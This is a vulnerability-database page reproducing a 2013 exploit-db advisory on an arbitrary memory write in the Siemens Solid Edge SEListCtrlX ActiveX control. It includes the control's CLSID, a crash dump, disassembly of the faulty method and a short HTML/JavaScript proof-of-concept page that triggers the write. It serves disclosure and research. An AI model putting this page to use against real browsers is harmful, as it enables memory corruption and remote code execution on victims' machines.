Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

SIEMENS Solid Edge ST4/ST5 SEListCtrlX - ActiveX SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution

🗓️ 26 May 2013 00:00:00Reported by rgodType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 29 Views

SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX Control SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution Vulnerabilit

Code
SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX Control SetItemReadOnly  
Arbitrary Memory Rewrite Remote Code Execution Vulnerability

tested against: Microsoft Windows Server 2003 r2 sp2
                Microsoft Windows XP sp3
                Microsoft Windows 7
                Internet Explorer 7/8

software description: http://en.wikipedia.org/wiki/Solid_Edge

vendor site: http://www.siemens.com/entry/cc/en/

download url: http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm

file tested: SolidEdgeV104ENGLISH_32Bit.exe


background:

the mentioned software installs an ActiveX control with 
the following settings:

ActiveX settings:
ProgID: SELISTCTRLX.SEListCtrlXCtrl.1
CLSID: {5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D}
binary path: C:\Program Files\Solid Edge ST4\Program\SEListCtrlX.ocx
Safe For Scripting (Registry): True
Safe For Initialization (Registry): True

Vulnerability:

This control exposes the SetItemReadOnly() method, see typelib:

...
/* DISPID=14 */
	function SetItemReadOnly(
		/* VT_VARIANT [12]  */ $hItem,
		/* VT_BOOL [11]  */ $bReadOnly 
		)
	{
	}
...

(i)
By setting to a memory address the first argument
and the second one to 'false' you can write a NULL
byte inside an arbitrary memory region.

(ii)
By setting to a memory address the first argument
and the second one to 'true' you can write a \x08
byte inside an arbitrary memory region.

Example crash:

EAX 61616161
ECX 0417AB44
EDX 01B7F530
EBX 0000000C
ESP 01B7F548
EBP 01B7F548
ESI 0417A930
EDI 027D5DD0 SEListCt.027D5DD0
EIP 033FD158 control.033FD158
C 0  ES 0023 32bit 0(FFFFFFFF)
P 1  CS 001B 32bit 0(FFFFFFFF)
A 0  SS 0023 32bit 0(FFFFFFFF)
Z 1  DS 0023 32bit 0(FFFFFFFF)
S 0  FS 003B 32bit 7FFD9000(4000)
T 0  GS 0000 NULL
D 0
O 0  LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -NAN FFFF FFFFFFFF FFFFFFFF
ST1 empty 3.3760355862290856960e-4932
ST2 empty +UNORM 48F4 00000000 00000000
ST3 empty -2.4061003025887744000e+130
ST4 empty -UNORM C198 00000000 00000000
ST5 empty 0.0
ST6 empty 1633771873.0000000000
ST7 empty 1633771873.0000000000
               3 2 1 0      E S P U O Z D I
FST 4000  Cond 1 0 0 0  Err 0 0 0 0 0 0 0 0  (EQ)
FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1

Call stack of thread 000009B8
Address    Stack      Procedure / arguments                                                             Called from                   Frame
01B7F54C   027D5DF3   control.?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z                       SEListCt.027D5DED             01B7F548
01B7F560   787FF820   Includes SEListCt.027D5DF3                                                        mfc100u.787FF81E              01B7F55C
01B7F56C   78807BF5   mfc100u.787FF810                                                                  mfc100u.78807BF0              01B7F618
01B7F61C   78808312   ? mfc100u.78807A5B                                                                mfc100u.7880830D              01B7F618



vulnerable code, inside the close control.dll:
...
;------------------------------------------------------------------------------
  		Align	4
 ?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z:
  		push	ebp
  		mov	ebp,esp
  		mov	eax,[ebp+08h]
  		test	eax,eax
  		jz 	L1011D15C
  		cmp	dword ptr [ebp+0Ch],00000000h
  		jz 	L1011D158
  		or	dword ptr [eax+2Ch],00000008h <-------------------- it crashes here
  		pop	ebp
  		retn	0008h
;------------------------------------------------------------------------------
...

...
;------------------------------------------------------------------------------
 L1011D158:
  		and	dword ptr [eax+2Ch],FFFFFFF7h <-------------------- or here           
 L1011D15C:
  		pop	ebp
  		retn	0008h
;------------------------------------------------------------------------------
...

As attachment, code to reproduce the crash.



<!-- saved from url=(0014)about:internet -->
<html>
<object classid='clsid:5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D' id='obj' />
</object>
<script language='javascript'>
//obj.SetItemReadOnly(0x61616161,false); 
obj.SetItemReadOnly(0x61616161,true); 
</script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 May 2013 00:00Current
7High risk
Vulners AI Score7
siemenssolid edgeactivex controlmemory rewriteremote code executionmicrosoft windows server 2003windows xpwindows 7internet explorer 7internet explorer 8
29